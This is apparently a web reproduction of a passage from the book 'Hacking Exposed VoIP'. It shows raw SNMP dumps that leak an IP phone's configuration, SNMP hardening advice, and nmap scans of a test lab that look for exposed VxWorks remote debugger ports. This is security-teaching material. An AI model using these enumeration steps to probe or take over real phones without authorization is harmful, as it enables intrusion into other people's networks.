SNMPv2-SMI::enterprises.6889.2.69.1.1.39.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.40.0 = STRING: "<ZSPV_x.x>" SNMPv2-SMI::enterprises.6889.2.69.1.1.41.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.42.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.43.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.44.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.45.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.1.46.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.47.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.48.0 = STRING: "700259674" SNMPv2-SMI::enterprises.6889.2.69.1.1.49.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.1.50.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.51.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.1.52.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.1.53.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.54.0 = STRING: "0.0.0.0" SNMPv2-SMI::enterprises.6889.2.69.1.1.55.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.56.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.57.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.58.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.59.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.60.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.1.61.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.1.62.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.63.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.1.64.0 = STRING: "0.0.0.0" SNMPv2-SMI::enterprises.6889.2.69.1.1.65.0 = INTEGER: 50002 SNMPv2-SMI::enterprises.6889.2.69.1.1.66.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.67.0 = STRING: "1" SNMPv2-SMI::enterprises.6889.2.69.1.1.68.0 = STRING: "1SunApr2L" SNMPv2-SMI::enterprises.6889.2.69.1.1.69.0 = STRING: "LSunOct2L" SNMPv2-SMI::enterprises.6889.2.69.1.1.70.0 = STRING: "0:00" SNMPv2-SMI::enterprises.6889.2.69.1.1.71.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.72.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.1.0 = STRING: "0.0.0.0" SNMPv2-SMI::enterprises.6889.2.69.1.2.2.0 = INTEGER: 1719 SNMPv2-SMI::enterprises.6889.2.69.1.2.3.0 = STRING: "192.168.1.53" SNMPv2-SMI::enterprises.6889.2.69.1.2.4.0 = STRING: "192.168.1.1" SNMPv2-SMI::enterprises.6889.2.69.1.2.5.0 = STRING: "255.255.255.0" SNMPv2-SMI::enterprises.6889.2.69.1.2.6.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.2.7.0 = INTEGER: 176 SNMPv2-SMI::enterprises.6889.2.69.1.2.8.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.2.9.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.2.10.0 = INTEGER: 46 SNMPv2-SMI::enterprises.6889.2.69.1.2.11.0 = INTEGER: 34 SNMPv2-SMI::enterprises.6889.2.69.1.2.12.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.13.0 = INTEGER: 6 SNMPv2-SMI::enterprises.6889.2.69.1.2.14.0 = INTEGER: 6 SNMPv2-SMI::enterprises.6889.2.69.1.2.15.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.16.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.2.17.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.18.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.19.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.20.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.21.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.2.22.0 = INTEGER: 60 SNMPv2-SMI::enterprises.6889.2.69.1.2.23.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.2.24.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.25.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.2.26.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.27.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.2.28.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.29.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.2.30.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.3.1.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.3.2.0 = STRING: "s20d01b2_2.bin" SNMPv2-SMI::enterprises.6889.2.69.1.3.3.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.1 = STRING: "Jan 01 00:00:00:tConfig:Unexpected Msg from <Int Lvl>: mt=19, st=72" SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.2 = STRING: "Jan 01 00:00:00:tHttpDownLoop:httpdownload: Connection Timeout" SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.3 = STRING: "Jan 01 00:00:00:tBoot:http_getScript: Download failed " SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.4 = STRING: "Jan 01 00:00:00:tBoot:http_getScript: Download failed " SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.5 = STRING: "Jan 01 00:00:00: tBoot:msgQSend failed (mt=2, st=0) errno=3d0001, QID=0x80e43480" SNMPv2-SMI::enterprises.6889.2.69.1.3.4.1.1.6 = STRING: "Jan 01 00:00:02:tPhone:Unexpected Msg from tUiDirector: mt=26, st=107" SNMPv2-SMI::enterprises.6889.2.69.1.4.1.0 = INTEGER: 5004 SNMPv2-SMI::enterprises.6889.2.69.1.4.2.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.3.0 = STRING: "0.0.0.0" SNMPv2-SMI::enterprises.6889.2.69.1.4.4.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.5.0 = STRING: "EM_AudioCapability_ g711Ulaw64k_chosen" SNMPv2-SMI::enterprises.6889.2.69.1.4.6.0 = STRING: "EM_AudioCapability_ g711Ulaw64k_chosen" SNMPv2-SMI::enterprises.6889.2.69.1.4.7.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.8.0 = INTEGER: 20 SNMPv2-SMI::enterprises.6889.2.69.1.4.9.0 = STRING: "503" SNMPv2-SMI::enterprises.6889.2.69.1.4.10.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.11.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.12.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.13.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.14.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.15.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.16.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.17.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.18.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.4.19.0 = INTEGER: 5 SNMPv2-SMI::enterprises.6889.2.69.1.4.20.0 = INTEGER: 11 SNMPv2-SMI::enterprises.6889.2.69.1.4.21.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.4.22.0 = INTEGER: 10 SNMPv2-SMI::enterprises.6889.2.69.1.4.23.0 = INTEGER: 9 SNMPv2-SMI::enterprises.6889.2.69.1.4.24.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.4.25.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.4.26.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.4.27.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.5.1.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.5.2.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.3.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.4.0 = STRING: "cn" SNMPv2-SMI::enterprises.6889.2.69.1.5.5.0 = STRING: "telephoneNumber" SNMPv2-SMI::enterprises.6889.2.69.1.5.6.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.7.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.8.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.9.0 = STRING: "Latin 1" SNMPv2-SMI::enterprises.6889.2.69.1.5.10.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.11.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.12.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.13.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.14.0 = INTEGER: 3 SNMPv2-SMI::enterprises.6889.2.69.1.5.15.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.5.16.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.17.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.18.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.19.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.20.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.21.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.22.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.23.0 = STRING: " " SNMPv2-SMI::enterprises.6889.2.69.1.5.24.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.25.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.5.26.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.27.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.28.0 = INTEGER: 8000 SNMPv2-SMI::enterprises.6889.2.69.1.5.29.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.30.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.5.31.0 = INTEGER: 49721 SNMPv2-SMI::enterprises.6889.2.69.1.5.32.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.5.33.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.5.34.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.6.1.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.6.2.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.7.1.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.7.2.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.7.3.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.7.4.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.7.5.0 = IpAddress: 0.0.0.0 SNMPv2-SMI::enterprises.6889.2.69.1.7.6.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.7.7.0 = IpAddress: 0.0.0.0 SNMPv2-SMI::enterprises.6889.2.69.1.7.8.0 = INTEGER: 3600 SNMPv2-SMI::enterprises.6889.2.69.1.7.9.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.7.10.0 = IpAddress: 192.168.1.104 SNMPv2-SMI::enterprises.6889.2.69.1.7.11.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.7.12.0 = IpAddress: 0.0.0.0 SNMPv2-SMI::enterprises.6889.2.69.1.7.13.0 = INTEGER: 2

This vendor-specific SNMP query gave us even more information about the phone, including its SIP username (503), DNS server, configuration HTTP server IP address (192.168.1.104), its SIP domain (domain2), and other juicy configuration details. SolarWinds also has a graphical equivalent to snmpwalk called SNMP MIB Browser, which includes the database used earlier to find the Avaya OID.

Countermeasurs SNMP Enumeration Countermeasures

If possible, disable SNMP support on your phones. Change the default public and private SNMP community strings on all other network devices running SNMP v1 and v2. Upgrade any devices to SNMP v3, which supports strong authentication rather than simple text strings (public/private community strings).

Attack Enumerating VxWorks VoIP Devices

Popularity:

2

Simplicity:

3

Impact:

10

Risk Rating:

5

Many IP phones are developed on embedded real-time operating systems, such as VxWorks (http://www.vxworks.com). Before the phone actually ships, some vendors forget to turn off the remote debugging feature of VxWorks, which allows for administrative debugging access to the device. The VxWorks remote debugger typically listens on UDP or TCP port 17185 and allows connections from a remote debugging client.

Let's try scanning our test deployment with Nmap to see if any of our phones respond on those ports: 

 [root@domain2 ~]# nmap -sT 192.168.1.1-254 -p 17185 Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-11 22:19 CST Interesting ports on 192.168.1.21: PORT STATE SERVICE 17185/tcp closed unknown MAC Address: 00:04:13:24:23:8D (Snom Technology AG) Interesting ports on 192.168.1.22: PORT      STATE    SERVICE 17185/tcp filtered unknown MAC Address: 00:0F:34:11:80:45 (Cisco Systems) Interesting ports on 192.168.1.23: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:15:62:86:BA:3E (Unknown) Interesting ports on 192.168.1.24: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology) Interesting ports on 192.168.1.25: PORT      STATE    SERVICE 17185/tcp filtered unknown MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks) Interesting ports on 192.168.1.27: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:04:F2:03:15:46 (Circa Communications) Interesting ports on 192.168.1.51: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:04:13:23:34:95 (Snom Technology AG) Interesting ports on 192.168.1.53: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:04:0D:50:40:B0 (Avaya) Interesting ports on 192.168.1.54: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:0E:08:DA:24:AE (Sipura Technology) Interesting ports on 192.168.1.57: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics) Interesting ports on 192.168.1.103: PORT      STATE  SERVICE 17185/tcp closed unknown MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.) Interesting ports on domain2 (192.168.1.104): PORT      STATE  SERVICE 17185/tcp closed unknown Nmap finished: 109 IP addresses (12 hosts up) scanned in 19.239 seconds [root@domain2 ~]# nmap -sU 192.168.1.1-254 -p 17185 Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-11 22:21 CST Interesting ports on 192.168.1.21: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:04:13:24:23:8D (Snom Technology AG) Interesting ports on 192.168.1.22: PORT      STATE         SERVICE 17185/udp openfiltered wdbrpc MAC Address: 00:0F:34:11:80:45 (Cisco Systems) Interesting ports on 192.168.1.23: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:15:62:86:BA:3E (Unknown) Interesting ports on 192.168.1.24: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology) Interesting ports on 192.168.1.25: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks) Interesting ports on 192.168.1.27: PORT      STATE         SERVICE 17185/udp openfiltered wdbrpc MAC Address: 00:04:F2:03:15:46 (Circa Communications) Interesting ports on 192.168.1.51: PORT STATE SERVICE 17185/udp closed wdbrpc MAC Address: 00:04:13:23:34:95 (Snom Technology AG) Interesting ports on 192.168.1.53: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:04:0D:50:40:B0 (Avaya) Interesting ports on 192.168.1.54: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:0E:08:DA:24:AE (Sipura Technology) Interesting ports on 192.168.1.57: PORT      STATE         SERVICE 17185/udp openfiltered wdbrpc MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics) Interesting ports on 192.168.1.103: PORT      STATE  SERVICE 17185/udp closed wdbrpc MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.) Interesting ports on domain2 (192.168.1.104): PORT      STATE  SERVICE 17185/udp closed wdbrpc Nmap finished: 109 IP addresses (12 hosts up) scanned in 9.043 seconds

It looks like the Cisco 7940 (192.168.1.22), Polycom (192.168.1.27), and Zultys (192.168.1.57) might have that port enabled. All an attacker has to do is connect with the native VxWorks debugger to gain full administrative access to that device.

There's really no recourse that an end user can take in this caseunless the vendor closes this gaping hole themselves with a patch or update.

Note 

The VoIP service enumeration examples covered in this chapter span the wealth of other support services that may exist in a VoIP network. Rather than reinvent the wheel, we recommend picking up a copy of Hacking Exposed, Fifth Edition by Stuart McClure, Joel Scambray, and George Kurtz (McGraw-Hill, 2005), which covers other enumeration examples not specific to VoIP that may be useful in your enumeration efforts.


Previous page
Table of content
Next page
Hacking Exposed VoIP. Voice Over IP Security Secrets & Solutions
Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
ISBN: 0072263644
EAN: 2147483647
Year: 2004
Pages: 158
Authors: David Endler, Mark Collier
BUY ON AMAZON
Introducing Microsoft Office InfoPath 2003 (Bpg-Other)
MySQL Cookbook
101 Microsoft Visual Basic .NET Applications
After Effects and Photoshop: Animation and Production Effects for DV and Film, Second Edition
Professional Struts Applications: Building Web Sites with Struts ObjectRelational Bridge, Lucene, and Velocity (Experts Voice)
Oracle SQL*Plus: The Definitive Guide (Definitive Guides)
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy